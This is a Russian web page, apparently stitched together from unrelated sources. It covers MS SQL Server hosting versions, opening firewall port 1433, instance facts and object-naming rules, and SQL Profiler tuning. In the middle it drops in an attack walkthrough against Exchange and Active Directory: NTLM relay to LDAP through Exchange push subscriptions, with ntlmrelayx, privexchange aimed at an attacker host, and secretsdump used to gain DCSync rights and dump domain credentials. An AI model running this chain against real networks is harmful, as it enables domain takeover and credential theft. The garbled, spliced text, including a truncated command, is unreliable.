MS SQL Server — службы анализа

Как гласит военная наука, имеющая много общего с хакерским ремеслом, прежде чем ввязаться в сражение, нужна разведка местности. О том, как извлечь пользовательские данные в Active Directory, читай в статье «Разведка в Active Directory. Получаем пользовательские данные в сетях Windows без привилегий».

Версии MSSQL на хостинге

На виртуальном Windows-хостинге доступна версия Microsoft SQL Server 2017 Web Edition c возможностью работы в режиме совместимости с SQL Server 2008.

Изменить версию MSSQL на виртуальном хостинге невозможно.

Если для вашего проекта требуется другая версия базы данных, то рекомендуем приобрести сервер Windows-VPS. Обладая полными root-правами на VPS, вы сможете самостоятельно установить необходимый сервер баз данных. Также установка программного обеспечения возможна в рамках услуги Администрирование сервера VPS.

Настройка Брэндмаура

Если после выполнения всех перечисленных действий сервер не доступен по сети, то проверьте настройки брандмауэра/антивируса/сетевого экрана.

Если на серверном компьютере включен брандмауэр или установлен сетевой экран (Firewall), то это может препятствовать соединению с сервером. Для быстрого получения ответа можно временно выключить работу «защитной» программы (не рекомендуется).

Открытые порта 1433 в брандмауэре:

1. Откройте панель управления и выберите пункт Брандмауэр Windows.

2. Перейдите в дополнительные параметры

3. Выберите узел "Правила для входящих подключений" и затем, в правой панели — Создать правило

3. Выберите пункт "Для порта" и нажмите Далее

4. Укажите Протокол TCP и пункт "Определенные локальные порты". В поле укажите порт 1433 и нажмите Далее

5. В окне выбора профилей оставьте выбранными 3 галочки: доменный, частный, публичный. Нажмите кнопку Далее.

6. Укажите пункт "Разрешить подключение" и нажмите Далее

7. Укажите имя правилу (на свое усмотрение)

8. Нажмите "Готово"

Экземпляр SQL Server

  • Экземпляр — это установка SQL Server.
  • Экземпляр является точной копией того же программного обеспечения.
  • Если мы установим ‘n’ раз, то будут созданы ‘n’ экземпляры.
  • В SQL Server существует два типа экземпляров: а) по умолчанию; б) по имени.
  • На одном сервере будет поддерживаться только один экземпляр по умолчанию.
  • Несколько именованных экземпляров будут поддерживаться на одном сервере.
  • Экземпляр по умолчанию примет имя сервера в качестве имени экземпляра.
  • Имя службы экземпляра по умолчанию — MSSQLSERVER.
  • 16 экземпляров будут поддерживаться в версии 2000 года.
  • 50 экземпляров будут поддерживаться в 2005 и более поздних версиях.

Правила формирования имен объектов SQL сервера

При задании имен создаваемых объектов серверов  и баз данных, которые создаются на сервере, MS SQL задает ряд правил, пердставленных ниже.

  • максимальная длина имени — 128 символов для SQL Server 7.0

  • первым символом имени должна быть буква латинского алфавита или один из символов: @, _, #. Все остальные символы — буквы латинского алфавита, цифры или символы $, #, _.

  • в идентификаторе не допускается использование внутренних пробелов.

  • лучше не использовать в качестве имени зарезервированные слова SQL Server.

  • символы @ и # имеют специальное значение, когда они применяются в качестве первого символа: @ означает переменную, а символ # объявляет именуемый объект временным объектом. Объект, который начинается с двух знаков ## — глобальный временный объект.

Статьи на схожую тематику: 

Занимательно о сервере Ошибки SQL сервера

Остались вопросы? Мы с радостью поможем Вам в их решении.

Оставить заявку

ТЕХПОДДЕРЖКА:

+8 (495) 663 73 51 

info@  

Please enable JavaScript to view the comments powered by Disqus.

Exchange

Основная уязвимость в инфраструктуре этого программного продукта такова. Exchange обладает высокими привилегиями в домене Active Directory. Группа Exchange Windows Permissions имеет доступ WriteDacl в Active Directory, что позволяет любому члену этой группы изменять привилегии домена, среди которых есть привилегия для реализации атаки DCSync.

Чтобы выполнить произвольный код на хостах в сети, можно использовать особенности передачи аутентификации NTLM через SMB. Но другие протоколы также уязвимы для ретрансляции. Наиболее интересен для этого протокол LDAP, который можно использовать для чтения и изменения объектов в каталоге. Дело в том, что при подключении сервера с Windows к компьютеру злоумышленника существует возможность передать автоматическую проверку подлинности пользователя в системе другим машинам в сети, как показано на рисунке. Такой прием называют relay-атакой.

Схема relay-атаки

Когда аутентификация передается в LDAP, объекты в каталоге могут быть изменены. В результате этим объектам предоставляются привилегии злоумышленника, включая привилегии, необходимые для операций DCSync. Таким образом, мы должны заставить сервер Exchange проходить аутентификацию с помощью NTLM. Для этого необходимо заставить Exchange аутентифицировать нашу систему.

Можно заставить Exchange аутентифицироваться по произвольному URL-адресу через HTTP с помощью функции Exchange PushSubscription. Служба push-уведомлений имеет возможность отправлять сообщения каждые X минут (где X может быть указан злоумышленником), даже если событие не произошло. Это гарантирует, что Exchange подключится к нам, даже если в папке входящих сообщений нет активности. Схема атаки показана на иллюстрации ниже.

Схема DCSync-атаки с использованием push-уведомлений

Инструменты для выполнения такой атаки входят в состав пакета impacket.

Сначала для ретрансляции LDAP запустим ntlmrelayx, укажем подконтрольного нам пользователя и контроллер домена.

-t ldap:// --escalate-user USER

Exchange

Теперь используем privexchange:

privexchange -ah Attacker_host Exchange_host -u USER -d DOMEN

Тут есть одно важное но: пользователь должен иметь почтовый ящик на нашем Exchange-сервере. Через некоторое время (когда будет отправлено push-уведомление) в ntlmrelayx можно наблюдать следующий вывод.

Успешный relay в ntlmrelayx

Это означает, что у нашего пользователя есть привилегии для DCSync:

secretsdump domain/user@DC -just-dc

Exchange

Успешная репликация учетных данных в secretsdump

Таким образом Exchange позволяет нам получить репликацию учетных данных.

Рекомендации по настройке

Profiler — отличный инструмент, который позволяет увидеть, что происходит внутри Server, и поможет пользователям выяснить, какие наихудшие запросы, как часто выполняется запрос.

Для реализации наилучших возможных индексов выполняют 4 шага:

  • Сбор текущей информации о рабочей нагрузке.
  • Определение соответствия индексов рабочей нагрузке, используя Profiler.
  • Обновление индексов с помощью Tuning Advisor.
  • Профилировщик автоматизирует сбор данных рабочей нагрузки, а консультант по настройке берет эти данные и создает индексы.
  • Для отслеживания в конкретной БД используют функцию фильтрации столбцов. Запускают трассировку через шаблон настройки и сохраняют данные трассировки в его файл.

    Алгоритм процесса:

  • Нажимают на «Инструменты».
  • Открывают помощник настройки ядра.
  • Предоставляют трассирующий файл.
  • Выбирают БД, в которой необходимо выполнить процесс трассировки.
  • В «Настройках» переходят в «Дополнительные параметры» и определяют максимальное пространство для рекомендации.
  • Начинают анализ.
  • Результаты показывают, насколько можно добиться улучшения, если предложения будут реализованы, и что нужно реализовать для повышения скорости работы БД.

    Для того чтобы перехватить взаимоблокировки с помощью Profiler, делают следующее:

  • Фиксируют тупик, сначала подключаются к БД Server.
  • Открывают Profiler в Server Management Studio.
  • Нажимают на «Инструменты».
  • Нажимают на Profiler.
  • 1 Звезда2 Звезды3 Звезды4 Звезды5 Звезд (Пока оценок нет)
    Загрузка...
    Понравилась статья? Поделиться с друзьями:
    Adblock
    detector